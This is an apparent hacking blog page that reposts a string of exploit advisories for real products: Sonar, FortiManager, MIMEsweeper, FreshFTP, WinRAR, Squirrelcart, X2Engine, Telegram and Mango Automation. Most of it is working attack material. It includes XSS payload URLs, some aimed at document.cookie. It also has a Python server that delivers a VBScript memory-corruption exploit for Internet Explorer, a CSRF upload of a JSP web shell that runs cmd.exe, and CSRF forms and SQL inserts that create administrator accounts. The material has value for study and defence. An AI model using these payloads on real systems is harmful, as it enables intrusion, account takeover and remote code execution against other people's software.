source: https://www.securityfocus.com/bid/57982/info
Sonar is prone to multiple cross-site scripting vulnerabilities because it fails to sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Sonar 3.4.1 is vulnerable; other versions may also be affected.
http://www.example.com/dependencies/index?search="><script>alert(/devilteam.pl/)</script>
http://www.example.com/dashboard/index/41730?did=4&period=3"><script>alert(/devilteam.pl/)</script>
http://www.example.com/reviews/index?review_id=&statuses[]=OPEN&statuses[]=REOPENED&severities[]=&projects[]=&author_login=&assignee_login="><script>alert(/devilteam.pl/)</script>&false_positives=without&sort=&asc=false&commit=Search
http://www.example.com/reviews/index?review_id=&statuses[]=OPEN&statuses[]=REOPENED&severities[]=&projects[]=&author_login="><script>alert(/devilteam.pl/)</script>&assignee_login=&false_positives=without&sort=&asc=false&commit=Search
http://www.example.com/api/sources?resource=<script>alert(/devilteam.pl/)</script>&format=txt
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863170859
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/AS-FORTIMANAGER-XSS-0924.txt
Vendor:
================================
www.fortinet.com
Product:
================================
FortiManager v5.2.2
FortiManager is a centralized security management appliance that allows you
to
centrally manage any number of Fortinet Network Security devices.
Vulnerability Type:
===================
Multiple Cross Site Scripting ( XSS ) in FortiManager GUI
http://www.fortiguard.com/advisory/multiple-xss-vulnerabilities-in-fortimanager-gui
CVE Reference:
==============
Pending
Vulnerability Details:
=====================
The Graphical User Interface (GUI) of FortiManager v5.2.2 is
vulnerable to two reflected Cross-Site Scripting (XSS) vulnerabilities.
2 potential XSS vectors were identified:
* XSS vulnerability in SOMVpnSSLPortalDialog.
* XSS vulnerability in FGDMngUpdHistory.
The Graphical User Interface (GUI) of FortiManager v5.2.3 is vulnerable to
one reflected XSS vulnerability and one stored XSS vulnerability.
2 potential XSS vectors were identified:
* XSS vulnerability in sharedjobmanager.
* XSS vulnerability in SOMServiceObjDialog.
Affected Products
XSS items 1-2: FortiManager v5.2.2 or earlier.
XSS items 3-4: FortiManager v5.2.3 or earlier.
Solutions:
===========
No workarounds are currently available.
Update to FortiManager v5.2.4.
Exploit code(s):
===============
1- Persistent:
https://localhost/cgi-bin/module/sharedobjmanager/firewall/SOMServiceObjDialog?devGrpId=18446744073709551615&deviceId=18446744073709551615&vdom=&adomId=3&vdomID=0&adomType=ems&cate=167&prodId=0&key=ALL&catetype=167&cate=167&permit_w=1&roid=189&startIndex=0&results=50
<div class="ui-comments-div"><textarea id="_comp_15" name="_comp_15"
class="ui-comments-text" cols="58" maxlength="255"
maxnum="255" placeholder="Write a comment"
rows="1"><script>alert(666)</script></textarea><label
class="ui-comments-remaining">
2- Reflected
https://localhost/cgi-bin/module/sharedobjmanager/policy_new/874/PolicyTable?vdom=%22%27/%3E%3C/script%3E%3Cscript%3Ealert%28%27[XSS%20FortiManager%20POC%20VM64%20v5.2.2%2008042015%20]\n\n%27%2bdocument.cookie%29%3C/script%3E
<https://localhost/cgi-bin/module/sharedobjmanager/policy_new/874/PolicyTable?vdom=%22%27/%3E%3C/script%3E%3Cscript%3Ealert%28%27[XSS%20FortiManager%20POC%20VM64%20v5.2.2%2008042015%20]%5Cn%5Cn%27%2bdocument.cookie%29%3C/script%3E>
Disclosure Timeline:
=========================================================
Vendor Notification: August 4, 2015
September 24, 2015 : Public Disclosure
Exploitation Technique:
=======================
Remote & Local
Severity Level:
=========================================================
Medium (3)
Description:
==========================================================
Request Method(s): [+] GET
Vulnerable Product: [+] FortiManager v5.2.2 & v5.2.3 or earlier
Vulnerable Parameter(s): [+] vdom, textarea field
Affected Area(s): [+] sharedobjmanager, SOMServiceObjDialog
===========================================================
[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere.
by hyp3rlinx
source: https://www.securityfocus.com/bid/58012/info
MIMEsweeper for SMTP is prone to multiple cross-site scripting vulnerabilities because it fails to sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
MIMEsweeper For SMTP 5.5 is vulnerable; other versions may also be affected.
https://www.example.com/MSWPMM/Common/Reminder.aspx?email=test<script>alert(document.cookie)</script>
http://www.example.com/MSWPMM/Common/NewAccount.aspx?email=<script>alert("xss")</script>
http://www.example.com/MSWPMM/Common/NewAccount.aspx?ddlCulture=<script>alert("xss")</script>
http://www.example.com/MSWPMM/Common/NewAccount.aspx?btnCreateAccount=<script>alert("xss")</script>
http://www.example.com/MSWPMM/Common/NewAccount.aspx?btnCancel=<script>alert("xss")</script>
http://www.example.com/MSWPMM/Common/SignIn.aspx?tbEmailAddress=<script>alert("xss")</script>ReturnUrl=%2fMSWPMM%2fCommon%2fdefault.aspx
http://www.example.com/MSWPMM/Common/SignIn.aspx?tbPassword=<script>alert("xss")</script>ReturnUrl=%2fMSWPMM%2fCommon%2fdefault.aspx
http://www.example.com/MSWPMM/Common/SignIn.aspx?cbAutoSignIn="<script>alert("xss")</script>
http://www.example.com/MSWPMM/Common/SignIn.aspx?btnSignIn=<script>alert("xss")</script>ReturnUrl=%2fMSWPMM%2fCommon%2fdefault.aspx
http://www.example.com/MSWPMM/Common/SignIn.aspx?reason=<script>alert("xss")</script>
********************************************************************************************
# Exploit Title: FreshFTP .QFL Local DOS(While Parsing).
# Date: 9/15/2015
# Exploit Author: Un_N0n
# Software Vendor : http://www.freshwebmaster.com/
# Software Link: http://www.freshwebmaster.com/download.html
# Version: 5.52
# Tested on: Windows 7 x86(32 BIT)
********************************************************************************************
[Steps to Produce the Crash]:
1- Goto Directory in which freshftp is installed.
2- create a file "Test.QFL"
3- paste in the following contents in it:
'''
FFD QUEUE «AJ»
AAAAA....upto 66666(bigger the file, more the resource usage)
'''
4- Save the file.
5- open freshftp.exe
6- When freshftp is started it looks for QFL file to load it, in this case, freshFTP suffers a
DOS condition due to unexpected format of the QFL file.
7- there is another case, sometimes freshftp won't load QFL on the startup, so to perform DOS
in this case, goto Queue-> Open Queue -> Browse the QFL file, DOS Condition occurs.
8- At the next startup, freshFTP will look for QFL file before starting therefore DOS condition
again.
This DOS condition leads to very high CPU Usage as well as RAM usage which can harm your system
so test carefully.
***********************************************************************************************
#!/usr/bin/python -w
# Title : WinRar SFX OLE Command Execution
# Date : 25/09/2015
# Author : R-73eN
# Tested on : Windows Xp SP3 with WinRAR 5.21
#
# Triggering the Vulnerability
# Run this python script
# Right click a file and then click on add to archive.
# check the 'Create SFX archive' box
# go to Advanced tab
# go to SFX options
# go to Text And icon
# copy the code that the script will generate to 'Text to display into sfx windows'
# Click OK two times and the sfx archive is generated.
# If someone opens that sfx archive a calculator should pop up.
#
# Video : https://youtu.be/vIslLJYvnaM
#
banner = ""
banner +=" ___ __ ____ _ _ \n"
banner +=" |_ _|_ __ / _| ___ / ___| ___ _ __ / \ | | \n"
banner +=" | || '_ \| |_ / _ \| | _ / _ \ '_ \ / _ \ | | \n"
banner +=" | || | | | _| (_) | |_| | __/ | | | / ___ \| |___ \n"
banner +=" |___|_| |_|_| \___/ \____|\___|_| |_| /_/ \_\_____|\n\n"
print banner
import socket
CRLF = "\r\n"
#OLE command execution
exploit = """<html>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >
<head>
</head>
<body>
<SCRIPT LANGUAGE="VBScript">
function runmumaa()
On Error Resume Next
set shell=createobject("Shell.Application")
shell.ShellExecute "calc.exe", "runas", 0
end function
</script>
<SCRIPT LANGUAGE="VBScript">
dim aa()
dim ab()
dim a0
dim a1
dim a2
dim a3
dim win9x
dim intVersion
dim rnda
dim funclass
dim myarray
Begin()
function Begin()
On Error Resume Next
info=Navigator.UserAgent
if(instr(info,"Win64")>0) then
exit function
end if
if (instr(info,"MSIE")>0) then
intVersion = CInt(Mid(info, InStr(info, "MSIE") + 5, 2))
else
exit function
end if
win9x=0
BeginInit()
If Create()=True Then
myarray= chrw(01)&chrw(2176)&chrw(01)&chrw(00)&chrw(00)&chrw(00)&chrw(00)&chrw(00)
myarray=myarray&chrw(00)&chrw(32767)&chrw(00)&chrw(0)
if(intVersion<4) then
document.write("<br> IE")
document.write(intVersion)
runshellcode()
else
setnotsafemode()
end if
end if
end function
function BeginInit()
Randomize()
redim aa(5)
redim ab(5)
a0=13+17*rnd(6)
a3=7+3*rnd(5)
end function
function Create()
On Error Resume Next
dim i
Create=False
For i = 0 To 400
If Over()=True Then
Create=True
Exit For
End If
Next
end function
sub testaa()
end sub
function mydata()
On Error Resume Next
i=testaa
i=null
redim Preserve aa(a2)
ab(0)=0
aa(a1)=i
ab(0)=6.36598737437801E-314
aa(a1+2)=myarray
ab(2)=1.74088534731324E-310
mydata=aa(a1)
redim Preserve aa(a0)
end function
function setnotsafemode()
On Error Resume Next
i=mydata()
i=rum(i+8)
i=rum(i+16)
j=rum(i+&h134)
for k=0 to &h60 step 4
j=rum(i+&h120+k)
if(j=14) then
j=0
redim Preserve aa(a2)
aa(a1+2)(i+&h11c+k)=ab(4)
redim Preserve aa(a0)
j=0
j=rum(i+&h120+k)
Exit for
end if
next
ab(2)=1.69759663316747E-313
runmumaa()
end function
function Over()
On Error Resume Next
dim type1,type2,type3
Over=False
a0=a0+a3
a1=a0+2
a2=a0+&h8000000
redim Preserve aa(a0)
redim ab(a0)
redim Preserve aa(a2)
type1=1
ab(0)=1.123456789012345678901234567890
aa(a0)=10
If(IsObject(aa(a1-1)) = False) Then
if(intVersion<4) then
mem=cint(a0+1)*16
j=vartype(aa(a1-1))
if((j=mem+4) or (j*8=mem+8)) then
if(vartype(aa(a1-1))<>0) Then
If(IsObject(aa(a1)) = False ) Then
type1=VarType(aa(a1))
end if
end if
else
redim Preserve aa(a0)
exit function
end if
else
if(vartype(aa(a1-1))<>0) Then
If(IsObject(aa(a1)) = False ) Then
type1=VarType(aa(a1))
end if
end if
end if
end if
If(type1=&h2f66) Then
Over=True
End If
If(type1=&hB9AD) Then
Over=True
win9x=1
End If
redim Preserve aa(a0)
end function
function rum(add)
On Error Resume Next
redim Preserve aa(a2)
ab(0)=0
aa(a1)=add+4
ab(0)=1.69759663316747E-313
rum=lenb(aa(a1))
ab(0)=0
redim Preserve aa(a0)
end function
</script>
</body>
</html>"""
response = "HTTP/1.1 200 OK" + CRLF + "Content-Type: text/html" + CRLF + "Connection: close" + CRLF + "Server: Apache" + CRLF + "Content-Length: " + str(len(exploit)) + CRLF + CRLF + exploit + CRLF
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
host = raw_input(" Enter Local IP: ")
server_address = (host, 8080)
sock.bind(server_address)
print "[+] Server started " + host + " [+]"
sock.listen(1)
print "[+] Insert this code on the 'Text to display into sfx windows' [+]"
print "\n<iframe src='http://" + host + ":8080/'> </iframe>"
print "\n[+] Waiting for request . . . [+]"
connection, client_address = sock.accept()
while True:
connection.recv(2048)
print "[+] Got request , sending exploit . . .[+]"
connection.send(exploit)
print "[+] Exploit sent , A calc should pop up . . [+]"
print "\nhttps://www.infogen.al/\n"
exit(0)
source: https://www.securityfocus.com/bid/58025/info
Squirrelcart is prone to a cross-site scripting vulnerability because it fails to sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/index.php?show_record_links=1&table=Products"><script>alert(251);</script>&add_new_item=1
Source: https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2015-5075/
Details:
It was discovered that no protection against Cross-site Request Forgery attacks was implemented, resulting in an attacker being able to able to force the creation of a new administrative account.
Impact:
Cross-site Request Forgery exploits the way in which HTTP and web browsers work.
Due to the fact that HTTP is a stateless protocol, and that web browsers will include all relevant cookies for the domain that a request is for, if an administrator user was logged into the application and the attacker sent a link that the administrator duly followed (or the attacker tricked them into following a link on a page), the administrator’s browser would include all cookies (including the session cookies) in the request. The attacker’s link would then be executed with administrator privileges.
This attack is not limited to sending malicious URLs to users; multiple different attack vectors exist to perform this attack in a more covert manner, such as embedding the attack within an invisible iFrame on a different page. Using the iFrame method it is also possible to submit both GET and POST requests.
For example:
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<form action="http://localhost/x2engine/index.php/users/create" method="POST">
<input type="hidden" name="User[firstName]" value="John" />
<input type="hidden" name="User[lastName]" value="Smith" />
<input type="hidden" name="User[username]" value="adm1n" />
<input type="hidden" name="User[password]" value="letmein" />
<input type="hidden" name="User[userKey]" value="" />
<input type="hidden" name="User[title]" value="" />
<input type="hidden" name="User[department]" value="" />
<input type="hidden" name="User[officePhone]" value="" />
<input type="hidden" name="User[cellPhone]" value="" />
<input type="hidden" name="User[homePhone]" value="" />
<input type="hidden" name="User[address]" value="" />
<input type="hidden" name="User[backgroundInfo]" value="" />
<input type="hidden" name="User[emailAddress]" value="" />
<input type="hidden" name="User[status]" value="1" />
<input type="hidden" name="yt0" value="Create" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Exploit:
Exploit code is not required.
Remediation:
The vendor has released a patch.
Vendor status:
15/09/2014 Submitted initial contact via web form on X2Engine’s page
30/09/2014 Second initial contact message sent via web form
08/12/2014 Final chaser sent via their web form
20/01/2015 Automated response from the X2 website received on 08/12/2014. Attempting to contact the email address that it was sent from “john@x2engine.com”. If no response by the end of the week will start forced disclosure process
21/01/2015 Initial vendor response, details over vulnerability sent
26/02/2015 Chaser sent to vendor
17/04/2015 Second chaser sent to vendor
08/06/2015 Chaser sent to vendor. Unsure if his emails are getting through to us as he stated that he has been replying
08/06/2015 Vendor responded stating that they needed vuln details even though I had sent them months ago
09/06/2015 Vendor is approximately 75% through fix and will have a patch out within the next few weeks
26/06/2015 MITRE assigned CVE-2015-5075
13/07/2015 Vendor asked for CVEs to add to their page. Should be ready for publish soon when they have given their clients time to patch
22/07/2015 Email from vendor stating that they released the fix for this on 13/07/2015 and asked when we would be disclosing
23/07/2015 Vendor has asked if we wait off until they release their next major update (At some point in the next 2 weeks). Confirmed this is fine and to contact us when they have a release date confirmed for it
24/08/2015 Replied to the vendor
26/08/2015 Vendor confirmed that they are ready for us to publish
18/09/2015 Published
Copyright:
Copyright © Portcullis Computer Security Limited 2015, All rights reserved worldwide. Permission is hereby granted for the electronic redistribution of this information. It is not to be edited or altered in any way without the express written consent of Portcullis Computer Security Limited.
Disclaimer:
The information herein contained may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user’s risk. In no event shall the author/distributor (Portcullis Computer Security Limited) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.
#[+] Title: Telegram - Input Length Handling Denial of Service Vulnerability
#[+] Product: Telegram
#[+] Vendor: http://telegram.org/
#[+] SoftWare Link : https://itunes.apple.com/en/app/telegram-messenger/id686449807?mt=8
#[+] Vulnerable Version(s): Telegram 3.2 on IOS 9.0.1
#
#
# Author : Mohammad Reza Espargham
# Linkedin : https://ir.linkedin.com/in/rezasp
# E-Mail : me[at]reza[dot]es , reza.espargham[at]gmail[dot]com
# Website : www.reza.es
# Twitter : https://twitter.com/rezesp
# FaceBook : https://www.facebook.com/mohammadreza.espargham
#Demo : https://youtu.be/fszP8jyJN0M
# 1. open your phone contacts / add contact
# 2. Past 5000 X “A” in your contact name / save contact
# 3. Open telegram and goto “Contact"
# 4. Crashed ;)
Debug Report
{"app_name":"Telegram","timestamp":”2015-xx-xx","app_version":"3.2":"ph.telegra.Telegraph","share_with_app_devs":false,"is_first_party":false"os_version":"iPhone OS 9.0.1 (13A404)","name":"Telegram"}
Incident Identifier: xxxxx xxxxx xxxxx xxxxx xxxxx xxxxx
CrashReporter Key: 7e3613t9t457ge3a2en22fc58e7rr44r49311297
Hardware Model: iPhone6,1
Process: Telegram [616]
Path: /private/var/mobile/Containers/Bundle/Application/xxxxx xxxxx xxxxx xxxxx xxxxx xxxxx/Telegram.app/Telegram
Identifier: ph.telegra.Telegraph
Code Type: ARM-64 (Native)
Parent Process: launchd [1]
Date/Time: 2015-xx-xx 03:12:02.02
Launch Time: 2015-xx-xx 23:03:12.12
OS Version: iOS 9.0.1 (13A404)
Exception Type: EXC_CRASH (SIGILL)
Exception Codes: 0x0000000000000000, 0x0000000000000000
Exception Note: EXC_CORPSE_NOTIFY
Triggered by Thread: 0
Filtered syslog:
None found
Thread 0 name: Dispatch queue: com.apple.main-thread
Thread 0 Crashed:
0 libsystem_kernel.dylib 0x000000019b578c30 0x19b578000 + 3120
1 libsystem_kernel.dylib 0x000000019b578aac 0x19b578000 + 2732
2 CoreFoundation 0x0000000186100168 0x186024000 + 901480
3 CoreFoundation 0x00000001860fde6c 0x186024000 + 892524
4 CoreFoundation 0x000000018602cdc0 0x186024000 + 36288
5 GraphicsServices 0x0000000191180088 0x191174000 + 49288
6 UIKit 0x000000018b706f60 0x18b68c000 + 503648
7 Telegram 0x0000000100016f70 0x100000000 + 94064
8 libdyld.dylib 0x000000019b4768b8 0x19b474000 + 10424
Activity ID: 0x0000000000042ea5
Activity Name: send control actions
Activity Image Path: /System/Library/Frameworks/UIKit.framework/UIKit
Activity Offset: 0x00032b34
Activity Running Time: 0.980331 sec
Mango Automation 2.6.0 CSRF File Upload And Arbitrary JSP Code Execution
Vendor: Infinite Automation Systems Inc.
Product web page: http://www.infiniteautomation.com/
Affected version: 2.5.2 and 2.6.0 beta (build 327)
Summary: Mango Automation is a flexible SCADA, HMI And Automation software application that allows you
to view, log, graph, animate, alarm, and report on data from sensors, equipment, PLCs, databases, webpages,
etc. It is easy, affordable, and open source.
Desc: Mango suffers from an authenticated arbitrary JSP code execution. The vulnerability is caused due
to the improper verification of uploaded image files in 'graphicalViewsBackgroundUpload' script via the
'backgroundImage' POST parameter which allows of arbitrary files being uploaded in '/modules/graphicalViews/web/graphicalViewUploads/'.
This can be exploited to execute arbitrary JSP code by uploading a malicious JSP script file that will be
stored as a sequence number depending on how many files were uploaded (1.jsp or 2.jsp or 3.jsp .. n.jsp).
Tested on: Microsoft Windows 7 Professional SP1 (EN) 32/64bit
Microsoft Windows 7 Ultimate SP1 (EN) 32/64bit
Jetty(9.2.2.v20140723)
Java(TM) SE Runtime Environment (build 1.8.0_51-b16)
Java HotSpot(TM) Client VM (build 25.51-b03, mixed mode)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2015-5262
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5262.php
20.08.2015
--
<html>
<body>
<script>
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "http://localhost:8080/graphicalViewsBackgroundUpload", true);
xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8");
xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=----WebKitFormBoundaryb8cxmjBwpzDcHUVI");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.8");
xhr.withCredentials = true;
var body = "------WebKitFormBoundaryb8cxmjBwpzDcHUVI\r\n" +
"Content-Disposition: form-data; name=\"backgroundImage\"; filename=\"cmd.jsp\"\r\n" +
"Content-Type: application/octet-stream\r\n" +
"\r\n" +
"\x3c%@ page import=\"java.util.*,java.io.*,java.net.*\"%\x3e\r\n" +
"\x3cHTML\x3e\x3cBODY\x3e\r\n" +
"\x3cFORM METHOD=\"POST\" NAME=\"myform\" ACTION=\"\"\x3e\r\n" +
"\x3cINPUT TYPE=\"text\" NAME=\"cmd\"\x3e\r\n" +
"\x3cINPUT TYPE=\"submit\" VALUE=\"Send\"\x3e\r\n" +
"\x3c/FORM\x3e\r\n" +
"\x3cpre\x3e\r\n" +
"\x3c%\r\n" +
"if (request.getParameter(\"cmd\") != null) {\r\n" +
" out.println(\"Command: \" + request.getParameter(\"cmd\") + \"\\n\x3cBR\x3e\");\r\n" +
" Process p = Runtime.getRuntime().exec(\"cmd.exe /c \" + request.getParameter(\"cmd\"));\r\n" +
" OutputStream os = p.getOutputStream();\r\n" +
" InputStream in = p.getInputStream();\r\n" +
" DataInputStream dis = new DataInputStream(in);\r\n" +
" String disr = dis.readLine();\r\n" +
" while ( disr != null ) {\r\n" +
" out.println(disr); disr = dis.readLine(); }\r\n" +
" }\r\n" +
"%\x3e\r\n" +
"\x3c/pre\x3e\r\n" +
"\x3c/BODY\x3e\x3c/HTML\x3e\r\n" +
"------WebKitFormBoundaryb8cxmjBwpzDcHUVI--\r\n";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
</script>
<form action="#">
<input type="button" value="Submit request" onclick="submitRequest();" />
</form>
</body>
</html>
Webshell: http://localhost:8080/modules/graphicalViews/web/graphicalViewUploads/17.jsp
#################################################################
Mango Automation 2.6.0 CSRF Arbitrary Command Execution Exploit
Advisory ID: ZSL-2015-5261
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5261.php
20.08.2015
--
<html>
<body>
<form action="http://localhost:8080/dwr/call/plaincall/EventHandlersDwr.testProcessCommand.dwr" method="POST">
<input type="hidden" name="callCount" value="1" />
<input type="hidden" name="page" value="/event_handlers.shtm" />
<input type="hidden" name="httpSessionId" value=" " />
<input type="hidden" name="scriptSessionId" value="26D579040C1C11D2E21D1E5F321094E5866" />
<input type="hidden" name="c0-scriptName" value="EventHandlersDwr" />
<input type="hidden" name="c0-methodName" value="testProcessCommand" />
<input type="hidden" name="c0-id" value="0" />
<input type="hidden" name="c0-param0" value="string:C:\\windows\\system32\\calc.exe" />
<input type="hidden" name="c0-param1" value="string:15" />
<input type="hidden" name="batchId" value="24" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
#################################################################
Mango Automation 2.6.0 Unprotected Debug Log View Vulnerability
Advisory ID: ZSL-2015-5260
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5260.php
20.08.2015
--
One scenario is where the attacker visits the following URL and takes over the admin session (given that the administrator didn't manually disabled the debugging and has produced some exception in current session):
- http://localhost:8080/status/
Other scenario is where the attacker sends a link to the victim so the victim after clicking on the link, generates exception and writes all his session attributes in the status page:
- http://localhost/status/mango.json?time=$
- http://localhost/status/
Sample status output:
\"$\"\r\n\r\n\r\nSESSION ATTRIBUTES\r\n sessionUser=User [id=6, username=n00b, password=NWoZK3kTsExUV00Ywo1G5jlUKKs=, email=z@s.l, phone=123321, admin=true, disabled=false, dataSourcePermissions=[], dataPointPermissions=[], homeUrl=, lastLogin=1440142956496, receiveAlarmEmails=0, receiveOwnAuditEvents=false, timezone=]\r\n LONG_POLL_DATA_TIMEOUT=1440143583487\r\n LONG_POLL_DATA=[com.serotonin.m2m2.web.dwr.longPoll.LongPollData@839308, com.serotonin.m2m2.web.dwr.longPoll.LongPollData@1b4dafa]\r\n\r\n\r\nCONTEXT ATTRIBUTES\r\n DwrContainer=org.directwebremoting.impl.DefaultContainer@138158\r\n constants.EventType.EventTypeNames.AUDIT=AUDIT\r\n constants.SystemEventType.TYPE_USER_LOGIN=USER_LOGIN\r\n constants.Permissions.DataPointAccessTypes.READ=1\r\n org.directwebremoting.ContainerList=[org.directwebremoting.impl.DefaultContainer@138158]\r\n constants.DataTypes.BINARY=1\r\n constants.UserComment.TYPE_EVENT=1\r\n constants.SystemEventType.TYPE_SYSTEM_STARTUP=SYSTEM_STARTUP\r\n javax.servlet.ServletConfig=org.eclipse.jetty.servlet.ServletHolder$Config@bc620e\r\n
Also you can list all of the Classes known to DWR:
- http://localhost:8080/dwr/index.html
#################################################################
Mango Automation 2.6.0 CSRF Arbitrary SQL Query Execution
Advisory ID: ZSL-2015-5259
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5259.php
20.08.2015
--
SQL query in version 2.5.2 (pass 123123) with hash injection:
-------------------------------------------------------------
INSERT INTO USERS VALUES(1337,'gjoko','YB8YiWZ++uuzO4wSVyg12j8Cf3g=','gjoko@z.sl','','Y','N',1440075860103,'','0','N','','Y');
1 records(s) updated.
SQL query in version 2.6.0 beta build 327 (pass 123123) with hash injection:
----------------------------------------------------------------------------
INSERT INTO USERS VALUES(1337,'gjoko','YB8YiWZ++uuzO4wSVyg12j8Cf3g=','gjoko@z.sl','','N',1440075860103,'','0','N','','Y','superadmin');
1 records(s) updated.
USERS table:
ID USERNAME PASSWORD EMAIL PHONE DISABLED LASTLOGIN HOMEURL RECEIVEALARMEMAILS RECEIVEOWNAUDITEVENTS TIMEZONE MUTED PERMISSIONS
1.
POST /sqlConsole.shtm HTTP/1.1
Host: localhost:8080
Content-Length: 51
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://localhost:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://localhost:8080/sqlConsole.shtm
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: MANGO8080=13208s4v50p7duy7hjzmxetz1
sqlString=select+*+from+users%3B&query=Submit+query
2.
POST /sqlConsole.shtm HTTP/1.1
Host: localhost:8080
Content-Length: 54
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://localhost:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://localhost:8080/sqlConsole.shtm
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: MANGO8080=13208s4v50p7duy7hjzmxetz1
sqlString=select+*+from+users%3B&tables=Get+table+list
3.
POST /sqlConsole.shtm HTTP/1.1
Host: localhost:8080
Content-Length: 246
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://localhost:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://localhost:8080/sqlConsole.shtm
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: MANGO8080=13208s4v50p7duy7hjzmxetz1
sqlString=INSERT+INTO+USERS+VALUES%289%2C%27gjoko3%27%2C%27YB8YiWZ%2B%2BuuzO4wSVyg12j8Cf3g%3D%27%2C%27gjoko%40z.sl%27%2C%27333222111%27%2C%27Y%27%2C%27N%27%2C1440075860103%2C%27%27%2C%270%27%2C%27N%27%2C%27%27%2C%27Y%27%29%3B&update=Submit+update
#################################################################
Mango Automation 2.6.0 CSRF Add Admin Exploit
Advisory ID: ZSL-2015-5258
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5258.php
20.08.2015
--
2.5.2:
<!-- user hacker, pass 123123 -->
<html>
<body>
<form action="http://localhost:8080/dwr/call/plaincall/UsersDwr.saveUserAdmin.dwr" method="POST" enctype="text/plain">
<input type="hidden" name="callCount" value="1 page=/users.shtm httpSessionId= scriptSessionId=8BD64066486071219EB8691611D48F14109 c0-scriptName=UsersDwr c0-methodName=saveUserAdmin c0-id=0 c0-param0=number:-1 c0-param1=string:hacker c0-param2=string:123123 c0-param3=string:hacker%40hacker.hack c0-param4=string:111222333 c0-param5=boolean:true c0-param6=boolean:false c0-param7=string:0 c0-param8=boolean:false c0-param9=string: c0-param10=Array:[] c0-param11=Array:[] batchId=5 " />
<input type="submit" value="Submit request 1" />
</form>
</body>
</html>
2.6.0 beta (build 327):
<!-- user hacker3, pass admin (in sha1(base64) hash value) -->
<html>
<body>
<form action="http://localhost:8080/rest/v1/users.json" method="POST" enctype="text/plain">
<input type="hidden" name="{"username":"hacker3","password":"0DPiKuNIrrVmD8IUCuw1hQxNqZc" value="","email":"hacker@zeroscience.mk","phone":"111222333","muted":true,"disabled":false,"homeUrl":"http://www.zeroscience.mk","receiveAlarmEmails":"NONE","receiveOwnAuditEvents":false,"timezone":"","permissions":"user,superadmin"}" />
<input type="submit" value="Submit request 2" />
</form>
</body>
</html>
#################################################################
Mango Automation 2.6.0 Remote XSS POST Injection Vulnerability
Advisory ID: ZSL-2015-5257
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5257.php
20.08.2015
--
<html>
<head>
<title>Mango Automation 2.6.0 Remote XSS POST Injection Vulnerability</title>
</head>
<body>
<form name="login" method="post" action="http://localhost:8080/login.htm">
<input type="hidden" name="username" value='"><script>alert("XSS");</script>' />
<input type="hidden" name="password" value="blah" />
</form>
<script type="text/javascript">
document.login.submit();
</script>
</body>
</html>
#################################################################
Mango Automation 2.6.0 User Enumeration Weakness
Advisory ID: ZSL-2015-5256
